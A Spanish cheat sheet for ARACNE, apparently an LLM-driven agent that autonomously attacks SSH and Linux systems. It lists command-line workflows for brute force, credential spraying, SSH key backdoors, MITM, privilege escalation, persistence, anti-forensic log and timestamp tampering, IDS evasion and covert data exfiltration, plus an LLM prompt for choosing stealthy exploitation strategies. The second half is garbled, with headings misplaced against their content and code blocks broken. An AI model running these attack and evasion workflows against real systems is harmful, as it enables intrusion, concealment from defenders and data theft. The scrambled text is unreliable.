Saltar a contenido

Hoja de Referencia de ARACNE

Descripción General

ARACNE (Autonomous Reconnaissance and Attack Coordination for Network Exploitation) es un agente basado en LLM específicamente diseñado para dirigirse a servicios SSH y explorar y explotar autónomamente entornos de shell Linux. Combina el razonamiento de modelos de lenguaje de gran escala con técnicas tradicionales de pruebas de penetración para realizar ataques sofisticados en sistemas accesibles por SSH.

⚠️ Advertencia Crítica: Herramienta avanzada de explotación autónoma. Utilice solo en sistemas que posea o tenga autorización escrita explícita para probar. El uso no autorizado es ilegal.

Instalación

Requisitos Previos

# System requirements
python3 --version  # Python 3.9+
pip3 --version
git --version

# Required system packages
sudo apt update
sudo apt install -y python3-pip python3-venv git curl wget
sudo apt install -y openssh-client sshpass hydra nmap masscan

# Install additional security tools
sudo apt install -y john hashcat gobuster dirb nikto
sudo apt install -y metasploit-framework exploitdb

Métodos de Instalación

# Method 1: Git clone and setup
git clone https://github.com/aracne-ai/aracne.git
cd aracne
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

# Install LLM dependencies
pip install openai anthropic langchain
pip install transformers torch
pip install paramiko fabric pexpect

# Method 2: Docker installation
docker pull aracne/aracne:latest
docker run -it --rm -v $(pwd)/sessions:/app/sessions aracne/aracne:latest

# Method 3: PyPI installation (if available)
pip install aracne-agent

Configuración de Instalación

# Create configuration directory
mkdir -p ~/.aracne/config
mkdir -p ~/.aracne/sessions
mkdir -p ~/.aracne/payloads
mkdir -p ~/.aracne/logs

# Initialize configuration
aracne init

# Configure LLM providers
aracne config set openai_api_key "your-openai-key"
aracne config set openai_model "gpt-4"
aracne config set anthropic_api_key "your-anthropic-key"

# Set operational parameters
aracne config set max_session_time 3600
aracne config set autonomous_mode true
aracne config set stealth_mode true
aracne config set evidence_collection true

Comandos Principales

Operaciones Básicas

# Display help and version
aracne --help
aracne --version
aracne modules list

# Quick SSH reconnaissance
aracne recon ssh --target 192.168.1.100
aracne recon ssh --network 192.168.1.0/24
aracne recon ssh --target-list targets.txt

# SSH service analysis
aracne analyze ssh --target 192.168.1.100 --deep
aracne analyze ssh --target 192.168.1.100 --version-detection
aracne analyze ssh --target 192.168.1.100 --configuration-analysis

# System status and health
aracne status
aracne health-check
aracne modules status

Gestión de Objetivos

# Add SSH targets
aracne target add --host 192.168.1.100 --port 22
aracne target add --host example.com --port 2222
aracne target add --network 192.168.1.0/24 --ssh-only

# Target information and management
aracne target list --active
aracne target info 192.168.1.100
aracne target remove 192.168.1.100

# Import targets from various sources
aracne target import --nmap ssh_scan.xml
aracne target import --masscan masscan_results.txt
aracne target import --file ssh_targets.txt

# Target prioritization
aracne target prioritize --by vulnerability
aracne target prioritize --by accessibility
aracne target prioritize --custom-scoring

Gestión de Sesiones

# Create and manage attack sessions
aracne session create --target 192.168.1.100 --name "target_compromise"
aracne session list --active
aracne session switch target_compromise

# Session configuration
aracne session config --max-duration 2h
aracne session config --stealth-level high
aracne session config --logging-level verbose

# Session control
aracne session start --target 192.168.1.100
aracne session pause target_compromise
aracne session resume target_compromise
aracne session terminate target_compromise

Reconocimiento y Análisis SSH

Descubrimiento de Servicios SSH

# Comprehensive SSH discovery
aracne discover ssh --network 192.168.1.0/24 --comprehensive
aracne discover ssh --target-list targets.txt --fast
aracne discover ssh --target 192.168.1.100 --deep-analysis

# SSH version and banner analysis
aracne analyze banner --target 192.168.1.100
aracne analyze version --target 192.168.1.100 --vulnerability-check
aracne analyze configuration --target 192.168.1.100 --security-assessment

# SSH algorithm and cipher analysis
aracne analyze algorithms --target 192.168.1.100
aracne analyze ciphers --target 192.168.1.100 --weak-crypto
aracne analyze kex --target 192.168.1.100 --security-analysis

Evaluación de Vulnerabilidades SSH

# SSH-specific vulnerability scanning
aracne vuln scan-ssh --target 192.168.1.100 --comprehensive
aracne vuln scan-ssh --target 192.168.1.100 --known-exploits
aracne vuln scan-ssh --network 192.168.1.0/24 --quick

# Configuration vulnerability analysis
aracne vuln config --target 192.168.1.100 --misconfigurations
aracne vuln config --target 192.168.1.100 --weak-settings
aracne vuln config --target 192.168.1.100 --default-configs

# SSH implementation vulnerabilities
aracne vuln implementation --target 192.168.1.100 --version-specific
aracne vuln implementation --target 192.168.1.100 --buffer-overflows
aracne vuln implementation --target 192.168.1.100 --timing-attacks

Enumeración de Usuarios

# SSH user enumeration techniques
aracne enum users --target 192.168.1.100 --timing-based
aracne enum users --target 192.168.1.100 --error-based
aracne enum users --target 192.168.1.100 --comprehensive

# Username wordlist generation
aracne generate usernames --target 192.168.1.100 --context-aware
aracne generate usernames --company "Example Corp" --employees
aracne generate usernames --domain example.com --email-based

# User validation and verification
aracne validate users --target 192.168.1.100 --user-list users.txt
aracne validate users --target 192.168.1.100 --probabilistic
aracne validate users --target 192.168.1.100 --stealth-mode

Explotación Autónoma SSH

Ataques Basados en Credenciales

# Intelligent brute force attacks
aracne attack brute-force --target 192.168.1.100 --smart
aracne attack brute-force --target 192.168.1.100 --user admin --adaptive
aracne attack brute-force --target 192.168.1.100 --credential-stuffing

# Dictionary attacks with AI optimization
aracne attack dictionary --target 192.168.1.100 --ai-optimized
aracne attack dictionary --target 192.168.1.100 --context-aware
aracne attack dictionary --target 192.168.1.100 --pattern-learning

# Credential spraying
aracne attack spray --network 192.168.1.0/24 --common-passwords
aracne attack spray --target-list targets.txt --seasonal-passwords
aracne attack spray --targets multiple --lockout-aware

Ataques Basados en Claves

# SSH key discovery and analysis
aracne keys discover --target 192.168.1.100 --web-crawling
aracne keys discover --target 192.168.1.100 --git-repositories
aracne keys discover --target 192.168.1.100 --configuration-files

# Private key attacks
aracne keys attack --target 192.168.1.100 --weak-keys
aracne keys attack --target 192.168.1.100 --default-keys
aracne keys attack --target 192.168.1.100 --cracking

# Key injection and manipulation
aracne keys inject --target 192.168.1.100 --authorized-keys
aracne keys manipulate --target 192.168.1.100 --key-replacement
aracne keys backdoor --target 192.168.1.100 --persistent-access

Exploits a Nivel de Protocolo

# SSH protocol exploitation
aracne exploit protocol --target 192.168.1.100 --version-specific
aracne exploit protocol --target 192.168.1.100 --implementation-bugs
aracne exploit protocol --target 192.168.1.100 --timing-attacks

# Man-in-the-middle attacks
aracne exploit mitm --target 192.168.1.100 --arp-poisoning
aracne exploit mitm --target 192.168.1.100 --dns-spoofing
aracne exploit mitm --target 192.168.1.100 --certificate-manipulation

# Downgrade attacks
aracne exploit downgrade --target 192.168.1.100 --weak-algorithms
aracne exploit downgrade --target 192.168.1.100 --legacy-protocols
aracne exploit downgrade --target 192.168.1.100 --cipher-downgrade

Explotación de Shell Linux

Acceso Inicial y Establecimiento de Shell

# Establish initial shell access
aracne shell establish --target 192.168.1.100 --method ssh
aracne shell establish --target 192.168.1.100 --credentials user:pass
aracne shell establish --target 192.168.1.100 --key-file private_key

# Shell upgrade and stabilization
aracne shell upgrade --session session-123 --interactive
aracne shell upgrade --session session-123 --pty
aracne shell upgrade --session session-123 --full-terminal

# Shell persistence mechanisms
aracne shell persist --session session-123 --cron-job
aracne shell persist --session session-123 --systemd-service
aracne shell persist --session session-123 --ssh-keys

Reconocimiento del Sistema

# Autonomous system enumeration
aracne recon system --session session-123 --comprehensive
aracne recon system --session session-123 --quick-wins
aracne recon system --session session-123 --stealth-mode

# User and privilege enumeration
aracne recon users --session session-123 --all-users
aracne recon users --session session-123 --privileged-users
aracne recon users --session session-123 --sudo-capabilities

# Network and service discovery
aracne recon network --session session-123 --internal-networks
aracne recon services --session session-123 --running-services
aracne recon processes --session session-123 --interesting-processes

Escalada de Privilegios

# Autonomous privilege escalation
aracne privesc auto --session session-123 --all-techniques
aracne privesc auto --session session-123 --kernel-exploits
aracne privesc auto --session session-123 --suid-binaries

# Specific escalation techniques
aracne privesc sudo --session session-123 --sudo-abuse
aracne privesc cron --session session-123 --cron-jobs
aracne privesc services --session session-123 --service-abuse

# Custom escalation strategies
aracne privesc custom --session session-123 --ai-guided
aracne privesc search --session session-123 --novel-techniques
aracne privesc exploit --session session-123 --zero-day

Movimiento Lateral

# Network lateral movement
aracne lateral network --session session-123 --ssh-keys
aracne lateral network --session session-123 --credential-reuse
aracne lateral network --session session-123 --trust-relationships

# Service-based lateral movement
aracne lateral services --session session-123 --shared-services
aracne lateral services --session session-123 --database-access
aracne lateral services --session session-123 --file-shares

# Advanced lateral movement
aracne lateral advanced --session session-123 --kerberos
aracne lateral advanced --session session-123 --container-escape
aracne lateral advanced --session session-123 --cloud-metadata

Toma de Decisiones con IA

Motor de Razonamiento Autónomo

# AI reasoning configuration
reasoning_config = {
    "model": "gpt-4",
    "temperature": 0.2,
    "max_tokens": 4000,
    "reasoning_depth": 3,
    "confidence_threshold": 0.85,
    "exploration_factor": 0.3
}

# Custom reasoning prompts for SSH exploitation
ssh_analysis_prompt = """
Analyze the SSH service and system information:
Target: {target}
SSH Version: {ssh_version}
Available Users: {users}
System Information: {system_info}
Previous Attempts: {previous_attempts}

Determine the best exploitation strategy:
1. Most likely attack vectors
2. Probability of success for each
3. Stealth considerations
4. Risk assessment
5. Next steps recommendation
"""

Estrategias de Ataque Adaptativas

# AI-guided attack planning
aracne ai plan-attack --target 192.168.1.100 --objective shell-access
aracne ai plan-attack --session session-123 --objective privilege-escalation
aracne ai plan-attack --target 192.168.1.100 --stealth-priority

# Dynamic strategy adaptation
aracne ai adapt-strategy --session session-123 --defense-detected
aracne ai adapt-strategy --session session-123 --failure-analysis
aracne ai adapt-strategy --session session-123 --new-information

# Learning from interactions
aracne ai learn --session session-123 --command-responses
aracne ai learn --target 192.168.1.100 --defense-mechanisms
aracne ai learn --global --pattern-recognition

Generación Inteligente de Comandos```bash

AI-generated commands for exploration

aracne ai generate-commands --session session-123 --exploration aracne ai generate-commands --session session-123 --privilege-escalation aracne ai generate-commands --session session-123 --persistence

Context-aware command selection

aracne ai select-commands --session session-123 --current-context aracne ai select-commands --session session-123 --objective-focused aracne ai select-commands --session session-123 --stealth-optimized

Command effectiveness analysis

aracne ai analyze-effectiveness --session session-123 --command-history aracne ai analyze-effectiveness --session session-123 --success-patterns aracne ai analyze-effectiveness --session session-123 --failure-analysis ## Técnicas Avanzadas de Explotaciónbash

Stealth mode operations

aracne stealth enable --session session-123 --advanced-evasion aracne stealth timing --session session-123 --random-delays aracne stealth obfuscation --session session-123 --command-obfuscation

Anti-forensics techniques

aracne antiforensics enable --session session-123 --log-cleaning aracne antiforensics timestamps --session session-123 --timestamp-manipulation aracne antiforensics artifacts --session session-123 --artifact-removal

Detection evasion

aracne evasion ids --session session-123 --ids-evasion aracne evasion monitoring --session session-123 --monitoring-detection aracne evasion behavioral --session session-123 --behavioral-mimicry ### Sigilo y Evasiónbash

Establish persistent access

aracne persist establish --session session-123 --multiple-methods aracne persist establish --session session-123 --stealth-persistence aracne persist establish --session session-123 --redundant-access

Persistence validation and testing

aracne persist validate --session session-123 --all-methods aracne persist test --session session-123 --reconnection-test aracne persist monitor --session session-123 --persistence-health

Persistence cleanup and removal

aracne persist cleanup --session session-123 --selective-removal aracne persist remove --session session-123 --complete-cleanup aracne persist verify-removal --session session-123 --forensic-check ### Mecanismos de Persistenciabash

Intelligent data discovery

aracne data discover --session session-123 --sensitive-files aracne data discover --session session-123 --database-content aracne data discover --session session-123 --configuration-files

Data classification and prioritization

aracne data classify --session session-123 --ai-classification aracne data prioritize --session session-123 --business-value aracne data assess --session session-123 --sensitivity-analysis

Secure data exfiltration

aracne data exfiltrate --session session-123 --encrypted-channel aracne data exfiltrate --session session-123 --steganography aracne data exfiltrate --session session-123 --covert-channels ### Exfiltración y Recopilación de Datosbash

Real-time session monitoring

aracne monitor session --session session-123 --real-time aracne monitor activity --session session-123 --command-tracking aracne monitor progress --session session-123 --objective-tracking

Performance and resource monitoring

aracne monitor performance --session session-123 --resource-usage aracne monitor network --session session-123 --traffic-analysis aracne monitor system --session session-123 --system-impact

Alert and notification system

aracne monitor alerts --session session-123 --critical-events aracne monitor notifications --session session-123 --progress-updates aracne monitor warnings --session session-123 --risk-indicators ## Monitoreo y Registrobash

Enable detailed logging

aracne logging enable --session session-123 --comprehensive aracne logging enable --session session-123 --ai-decisions aracne logging enable --session session-123 --command-responses

Log analysis and insights

aracne logging analyze --session session-123 --pattern-analysis aracne logging analyze --session session-123 --success-factors aracne logging analyze --session session-123 --failure-analysis

Log export and reporting

aracne logging export --session session-123 --format json aracne logging export --session session-123 --timeline-format aracne logging export --session session-123 --forensic-format ### Monitoreo de Sesionesbash

Define authorized targets and scope

aracne scope define --target 192.168.1.100 --authorized aracne scope define --network 192.168.1.0/24 --internal-testing aracne scope validate --target 192.168.1.100 --legal-check

Documentation and evidence

aracne legal document --session session-123 --authorization-proof aracne legal evidence --session session-123 --chain-of-custody aracne legal export --session session-123 --court-ready

Compliance verification

aracne compliance check --session session-123 --ethical-guidelines aracne compliance verify --session session-123 --legal-requirements aracne compliance audit --session session-123 --comprehensive ### Registro Integralbash

Risk assessment and management

aracne risk assess --session session-123 --comprehensive aracne risk monitor --session session-123 --real-time aracne risk mitigate --session session-123 --automatic

Safety controls and limits

aracne safety enable --session session-123 --all-controls aracne safety limits --session session-123 --time-limits aracne safety boundaries --session session-123 --scope-enforcement

Emergency procedures

aracne emergency stop --session session-123 --immediate aracne emergency cleanup --session session-123 --evidence-removal aracne emergency report --session session-123 --incident-documentation ## Consideraciones de Seguridad y Éticabash

Optimize AI model performance

aracne optimize ai --model-selection --performance-focused aracne optimize ai --token-usage --cost-optimization aracne optimize ai --response-time --latency-reduction

Session performance optimization

aracne optimize session --session session-123 --speed-optimization aracne optimize session --session session-123 --resource-optimization aracne optimize session --session session-123 --stealth-optimization

Network and connectivity optimization

aracne optimize network --session session-123 --connection-stability aracne optimize network --session session-123 --bandwidth-optimization aracne optimize network --session session-123 --latency-reduction ### Autorización y Cumplimiento Legalbash

Debug mode and verbose logging

aracne --debug session start --target 192.168.1.100 aracne --verbose ai plan-attack --target 192.168.1.100 aracne logs view --level debug --component ai-reasoning

System diagnostics

aracne diagnose system --comprehensive aracne diagnose ai-models --connectivity-test aracne diagnose ssh-client --configuration-check

Error analysis and resolution

aracne errors analyze --session session-123 --root-cause aracne errors resolve --error-id 12345 --auto-fix aracne errors prevent --session session-123 --predictive-analysis ### Seguridad y Gestión de Riesgosbash

Session recovery and restoration

aracne recover session --session-id session-123 --full-recovery aracne recover state --session session-123 --checkpoint-restore aracne recover connection --session session-123 --reconnect

Backup and data protection

aracne backup create --session session-123 --incremental aracne backup restore --backup-id backup-456 --selective aracne backup verify --backup-id backup-456 --integrity-check

Data integrity and validation

aracne verify integrity --session session-123 --all-data aracne verify consistency --session session-123 --cross-validation aracne verify authenticity --session session-123 --digital-signatures ## Resolución de Problemas y Optimizaciónpython

integrations/siem_integration.py

import json import requests from aracne.core.integration import BaseIntegration

class SIEMIntegration(BaseIntegration): def init(self, siem_url, api_key): self.siem_url = siem_url self.api_key = api_key

def send_ssh_attempt(self, attempt_data):
    event = {
        "timestamp": attempt_data.timestamp,
        "source": "aracne",
        "event_type": "ssh_attempt",
        "target": attempt_data.target,
        "username": attempt_data.username,
        "success": attempt_data.success,
        "method": attempt_data.method
    }

    self.send_event(event)

def send_privilege_escalation(self, privesc_data):
    event = {
        "timestamp": privesc_data.timestamp,
        "source": "aracne",
        "event_type": "privilege_escalation",
        "target": privesc_data.target,
        "technique": privesc_data.technique,
        "success": privesc_data.success,
        "privileges_gained": privesc_data.privileges
    }

    self.send_event(event)

def send_event(self, event):
    headers = {
        "Authorization": f"Bearer {self.api_key}",
        "Content-Type": "application/json"
    }

    response = requests.post(
        f"{self.siem_url}/api/events",
        headers=headers,
        json=event
    )

    return response.status_code == 200

### Optimización de Rendimientopython

integrations/threat_intel.py

import requests from aracne.core.threat_intel import ThreatIntelProvider

class ThreatIntelIntegration(ThreatIntelProvider): def init(self, api_key): self.api_key = api_key self.base_url = "https://api.threatintel.com"

def get_ssh_vulnerabilities(self, ssh_version):
    headers = {"Authorization": f"Bearer {self.api_key}"}

    response = requests.get(
        f"{self.base_url}/vulnerabilities/ssh/{ssh_version}",
        headers=headers
    )

    if response.status_code == 200:
        return response.json()
    return []

def get_exploit_techniques(self, target_os, target_version):
    headers = {"Authorization": f"Bearer {self.api_key}"}

    response = requests.get(
        f"{self.base_url}/techniques/{target_os}/{target_version}",
        headers=headers
    )

    if response.status_code == 200:
        return response.json()
    return []

def report_new_technique(self, technique_data):
    headers = {
        "Authorization": f"Bearer {self.api_key}",
        "Content-Type": "application/json"
    }

    response = requests.post(
        f"{self.base_url}/techniques/report",
        headers=headers,
        json=technique_data
    )

    return response.status_code == 201

### Depuración y Diagnósticobash

Reconnaissance before exploitation

aracne recon comprehensive --target 192.168.1.100 --pre-exploitation aracne analyze target --target 192.168.1.100 --vulnerability-assessment aracne plan attack --target 192.168.1.100 --risk-assessment

Gradual escalation approach

aracne attack gentle --target 192.168.1.100 --low-impact aracne attack moderate --target 192.168.1.100 --measured-approach aracne attack aggressive --target 192.168.1.100 --high-confidence

Stealth and operational security

aracne stealth maximum --session session-123 --anti-detection aracne opsec enable --session session-123 --comprehensive aracne evasion advanced --session session-123 --adaptive ### Recuperación y Respaldobash

Model selection and tuning

aracne ai optimize --model-selection --task-specific aracne ai tune --parameters --performance-focused aracne ai calibrate --confidence-thresholds --accuracy-focused

Prompt engineering and optimization

aracne ai optimize-prompts --task ssh-exploitation aracne ai optimize-prompts --task privilege-escalation aracne ai optimize-prompts --task lateral-movement

Continuous learning and improvement

aracne ai learn --from-sessions --pattern-recognition aracne ai update --knowledge-base --latest-techniques aracne ai validate --accuracy --benchmark-testing ## Ejemplos de Integraciónbash

Session management best practices

aracne session plan --target 192.168.1.100 --comprehensive-planning aracne session execute --plan session-plan --monitored-execution aracne session review --session session-123 --lessons-learned

Documentation and reporting

aracne document session --session session-123 --comprehensive aracne report generate --session session-123 --technical-details aracne evidence collect --session session-123 --forensic-quality

Quality assurance and validation

aracne validate findings --session session-123 --cross-verification aracne verify exploits --session session-123 --proof-of-concept aracne assess impact --session session-123 --business-context ```### Integración de SIEM https://aracne.readthedocs.io/### Integración de Inteligencia de Amenazas https://aracne.readthedocs.io/ssh/## Mejores Prácticas https://aracne.readthedocs.io/ai/### Mejores Prácticas de Explotación SSH https://arxiv.org/search/?query=aracne+ssh### Optimización de Modelos de IA https://arxiv.org/search/?query=llm+exploitationSistemas de Hacking Autónomo

Comunidad

Entrenamiento